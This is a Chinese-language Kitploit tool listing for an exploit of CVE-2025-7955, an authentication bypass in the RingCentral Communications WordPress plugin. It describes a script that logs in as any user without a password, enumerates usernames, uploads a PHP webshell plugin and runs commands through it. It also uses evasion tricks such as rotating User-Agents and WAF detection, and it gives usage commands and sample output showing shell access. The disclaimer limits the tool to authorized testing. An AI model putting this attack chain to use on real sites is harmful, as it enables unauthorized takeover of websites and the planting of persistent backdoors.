Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-7955 — RingCentral Communications 1.5 - 1.6.8 - 缺少服务器端验证导致通过 ringcentral_admin_login_2fa_verify 函数进行身份验证绕过 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-7955
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试命令与控制身份验证红队
GitHubnxploited/cve-2025-7955

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - 缺少服务器端验证导致通过 ringcentral_admin_login_2fa_verify 函数进行身份验证绕过

131年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - 缺少服务器端验证导致通过 ringcentral_admin_login_2fa_verify 函数绕过认证

🚨 CVE-2025-7955 | RingCentral Communications WordPress 漏洞利用


📝 漏洞概述

CVE: CVE-2025-7955
受影响插件: RingCentral Communications (WordPress)
受影响版本: 1.5 – 1.6.8
CVSS 评分: 9.8 (严重)
类型: 认证绕过 (缺少服务器端验证)

RingCentral Communications WordPress 插件由于 ringcentral_admin_login_2fa_verify() 函数中的不当验证而存在认证绕过漏洞。版本 1.5 至 1.6.8 允许未经身份验证的攻击者仅通过提供相同的伪造代码即可登录为任何用户。


⚡ 脚本功能

此漏洞利用工具自动化 CVE-2025-7955 的整个攻击链。它旨在实现以下功能:

  • 绕过认证: 脚本无需密码即可登录 WordPress 为任意用户(通常为管理员),利用存在漏洞的 2FA 端点。
  • 自动发现用户名: 如果未提供用户名,脚本将尝试通过 WordPress REST API (/wp-json/wp/v2/users/ID) 枚举用户名。
  • 提取所需令牌: 自动获取插件上传所需的 CSRF 保护 nonce。
  • 上传恶意插件(Webshell): 通过身份验证后,脚本上传一个包含 PHP webshell 的 ZIP 插件。
  • 通过 Webshell 执行命令: 成功上传后,脚本通过 shell 运行 whoami 展示命令执行能力,并打印输出。
  • 隐蔽与规避特性: 使用随机延迟、轮换 User-Agent 列表以及基本的 WAF/验证码检测来绕过简单防护。

🚀 使用方法

  1. 准备你的恶意插件
    确保你的恶意插件 ZIP 文件(默认:Nxploit.zip)与脚本位于同一目录。

  2. 运行漏洞利用工具:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
    
    • -u, --url : (必需) 目标 WordPress 站点 URL
    • -user, --username : (可选) 登录用户名(省略时自动发现)
    • -id, --id_admin : (默认: 1) 用户 ID(管理员通常为 ID 1)
    • -z, --zip : (默认: Nxploit.zip) 恶意插件 ZIP 文件路径
  3. 示例:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress
    

    或指定用户名/ID:

    root@kitploit:~

✅ 预期成功输出

root@kitploit:~
888b    888                   888          d8b 888                 888 
8888b   888                   888          Y8P 888                 888 
88888b  888                   888              888                 888 
888Y88b 888 888  888 88888b.  888  .d88b.  888 888888 .d88b.   .d88888 
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888   d8P  Y8b d88" 888 
888  Y88888   X88K   888  888 888 888  888 888 888   88888888 888  888 
888   Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b.     Y88b 888 
888    Y888 888  888 88888P"  888  "Y88P"  888  "Y888 "Y8888   "Y88888 
                     888                                               
                     888                                               
                     888                                               
CVE-2025-7955 Exploit By : Nxploited 

[*] 正在使用 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] 正在尝试以 admin (ID: 1) 身份登录
[+] 登录成功!
[+] Nonce: 661e57f2e4
[*] 正在上传恶意插件...
[+] 插件上传成功!
[*] 正在执行: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND

🎯 主要特性

  • 无需密码: 利用逻辑缺陷完全绕过认证。
  • 自动枚举: 可通过公共 API 提取用户名和 ID。
  • 全自动化利用: 从登录到 webshell 上传再到命令执行,所有步骤均自动化。
  • 基础规避: 随机延迟、标头伪装以及基本防护检测。
  • 模块化: 可轻松修改插件载荷或按需添加功能。

⚠️ 免责声明

此工具 仅供授权的安全测试和教育用途使用。
在未经你拥有或明确许可测试的系统中使用是 非法的和不道德的。
作者对该脚本的任何滥用或造成的损失 不承担任何责任。


作者: Khaled Alenazi (Nxploited)

下载工具
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1